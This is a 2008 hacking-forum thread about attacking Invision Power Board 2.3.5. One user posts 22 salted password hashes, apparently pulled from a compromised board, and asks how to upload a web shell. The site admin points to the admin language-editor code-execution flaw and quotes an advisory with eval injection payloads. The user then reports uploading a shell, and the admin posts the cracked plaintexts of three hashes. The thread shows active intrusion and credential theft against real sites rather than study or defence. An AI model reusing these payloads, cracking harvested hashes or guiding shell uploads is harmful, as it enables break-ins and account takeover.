Login or Register ::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  :: April 28, 2024 Menu  Home  Logout  Discussions  Forums  Members List  IRC chat  Tools  Base64 coder  MD5 hash  CRC32 checksum  ROT13 coder  SHA-1 hash  URL-decoder  Sql Char Encoder  Affiliates  y3dips ITsec  Md5 Cracker  User Manuals  AlbumNow  Content  Content  Sections  FAQ  Top  Info  Feedback  Recommend Us  Search  Journal  Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9145 People Online: Visitors: 537 Members: 0 Total: 537 PacketStorm News ·301 Moved Permanently read more... IT Security and Insecurity Portal www.waraxe.us Forum Index -> All other hashes -> some questions on ipb    View previous topic :: View next topic  some questions on ipb Posted: Tue Sep 23, 2008 4:59 pm king424 Regular user   Joined: Apr 03, 2008 Posts: 24 first:i use ipb2.3.5 exp got some hash,but cann't crack them~ Hash: 4d86409a2fd8dffc4e60c915f83fde77 Salt: c~cfN Hash: 5a76d0a32d9e713d3f86fef9de08ed10 Salt: 2bzLS Hash: 6611271cb4fef84dee04fac706bba8bf Salt: G?dvO Hash: 2482566d9798bd8b66fb7d6ca343e0d1 Salt: ;"u?? Hash: 6afebdbc3da0e5fe025c8c80190d6acf Salt: ]}5td Hash: b5aa5095177b1fe1d7aba35ddf7c238e Salt: $QmZ; Hash: 4d1c98ad4b31e1518d0c9036d1922b41 Salt: |3|uE Hash: 8813d3647b5e23815d80f659ce9a1886 Salt: YgiMC Hash: 69d047edafb621fc1024366a39a26f01 Salt: &tg0~ Hash: f3df6fde904cfd2905099dba3dfb5a33 Salt: .Qpc} Hash: 3389e60cf59abffec47f28f42d87d7cd Salt: lq30x Hash: 06e5fdb9d0b1378cc5b863d3abcb29be Salt: L/(1V Hash: 0c0a9aba4d194b3b3ddd6458673b7bbe Salt: hM!v% Hash: 0554c34fc91fd76785e2713f7cfa22c1 Salt: +`{+u Hash: ea2c88dc1dd3ad67738e72c90677a1c9 Salt: D{|a? Hash: 6c8bc609808a88090bb90d7e5ea07620 Salt: hA80] Hash: f5523704af4d3a00c2d7fe59cdc345be Salt: Rv/3W Hash: 25ffb0cc85ac580f59112fe3ef76ec31 Salt: v|{|= Hash: e42bde777cffec3766c4e387cd69406b Salt: PkyRo Hash: 44352b5a1741ec1c382f0aa77f7cdb8e Salt: 8f+n) Hash: 9a5cc5f20a4d7a61ec25c83e7fa827a5 Salt: meshI Hash: f2b932b4f7550f3d4ad527abb7ab43b6 Salt: AAo.) The second:ipb2.3.5 how to upload shell? thanks for you help! Posted: Tue Sep 23, 2008 8:45 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory http://acid-root.new.fr/?0:18 Posted: Wed Sep 24, 2008 6:05 am king424 Regular user   Joined: Apr 03, 2008 Posts: 24 waraxe wrote: Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory http://acid-root.new.fr/?0:18 thanks for waraxe.i upload shell Successfull~~ but these hash cracked failure Posted: Wed Sep 24, 2008 7:55 am martin1 Regular user   Joined: Sep 21, 2008 Posts: 17 any chance one of you's can gimme some advice with this. As the link you supplied dont work Posted: Wed Sep 24, 2008 8:53 am waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu martin1 wrote: any chance one of you's can gimme some advice with this. As the link you supplied dont work http://acid-root.new.fr/?0:18 Code:        Title:   Invision Power Board <= 2.3.5                 Multiple Vulnerabilities and Security Bypass       Vendor:   http://www.invisionpower.com/community/board/     Advisory:   http://acid-root.new.fr/?0:18       Author:   DarkFig < gmdarkfig (at) gmail (dot) com >  Released on:   2008/08/29    Changelog:   2008/08/30      Summary:   Introduction       Blind SQL Injection                 Insecure SQL Password Usage                 Admin Session Hijacking       Deep Recursion Protection Bypass       Code Execution       Miscellanious   Risk level:   Medium / High ... ...  VI - CODE EXECUTION   The ACP allows admins to manage languages, they can   choose the default language, import a new one, and edit   them. Let's take a look in the file "sources/action_admin/   languages.php":    65| switch($this->ipsclass->input['code'])    66| {    ..|    88|  case 'doedit':    89|    $this->ipsclass->admin->cp_permission_check(...);    90|    $this->save_langfile();   110|  break;   ...|   935|    function save_langfile()   936|    {   ...|   957|      $lang_file = CACHE_PATH."cache/lang_cache/".$row['ldir'].   ...|                 "/".$this->ipsclass->input['lang_file'];   958|   959|      if (! file_exists( $lang_file ) )  ...   ...|   963|   964|      if (! is_writeable( $lang_file ) ) ...   ...|   969|      $barney = array();   970|          971|      foreach ($this->ipsclass->input as $k => $v)   972|      {   973|        if ( preg_match( "/^XX_(\S+)$/", $k, $match ) )   974|        {   975|          if ( isset($this->ipsclass->input[ $match[0] ]) )   976|          {   977|       $v = str_replace("'", "'", stripslashes($_POST[$match[0]]));   978|       $v = str_replace("<", "<",  $v );   979|       $v = str_replace(">", ">", $v );   980|       $v = str_replace("&", "&", $v );   981|       $v = str_replace("\r", "", $v );   982|                983|       $barney[ $match[1] ] = $v;   984|          }   985|        }   986|      }   As you can see, there's several replacements which are   made. Some HTML entities are converted to their applicable   characters. The "stripslashes()" function is also called.   But we don't really care about that, this will not cause   a problem, this was just to show you how user's inputs   are treated. Now let's see how the change is made:      993|    $start = "<?php\n\n".'$lang = array('."\n";    994|    995|  foreach($barney as $key => $text)    996|  {    997|    $text   = preg_replace("/\n{1,}$/", "", $text);    998|    $start .= "\n'".$key."'  => \"".str_replace( '"', '\"', $text)."\",";    999|  }   1000|          1001|  $start .= "\n\n);\n\n?".">";   1002|   1003|  if ($fh = fopen( $lang_file, 'w') )   1004|  {   1005|     fwrite($fh, $start );   1006|     fclose($fh);   1007|  }     So, there's a protection against double quotes, not all   escape characters. There are several ways to bypass this   protection.   The first method, is to play with what we call "dynamic   variables". With two $, we can execute PHP code.   Example: ${${@eval($_SERVER[HTTP_SH])}}   The second one, is to use another escape character, a   backslash (\) will do the stuff. The attacker must change   two inputs. Example:    First input: hello\   Second input: ); @eval($_SERVER[HTTP_SH]); /* Posted: Wed Sep 24, 2008 10:23 am martin1 Regular user   Joined: Sep 21, 2008 Posts: 17 Thanks waraxe Posted: Wed Sep 24, 2008 12:32 pm waraxe Site admin   Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Plaintext of 4d1c98ad4b31e1518d0c9036d1922b41 is forever Plaintext of 44352b5a1741ec1c382f0aa77f7cdb8e is mugello Plaintext of 06e5fdb9d0b1378cc5b863d3abcb29be is brabak Posted: Thu Sep 25, 2008 5:36 am king424 Regular user   Joined: Apr 03, 2008 Posts: 24 thanks again! anyone can crack any others? Posted: Fri Sep 26, 2008 7:08 am donkey Regular user   Joined: Sep 26, 2008 Posts: 11 how did u get the salt of that thing ? some questions on ipb   www.waraxe.us Forum Index -> All other hashes You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT   Page 1 of 1   All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year Oldest FirstNewest First  Select a forum Security Research by waraxe----------------General discussionHow to fixMetasploit related Hash cracking requests----------------MD5 hashesAll other hashesHash related information http://www.waraxe.us portal----------------SuggestionsCooperation proposals Security bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holes Various software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo Gallery Programming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssembler Reverse engineering----------------Newbies cornerDisassemblingPHP script decode requests Miscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy database Direct Downloads----------------ToolsTutorialsWordlists Recycle Bin----------------Removed messagesOutdated posts   Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.180 Seconds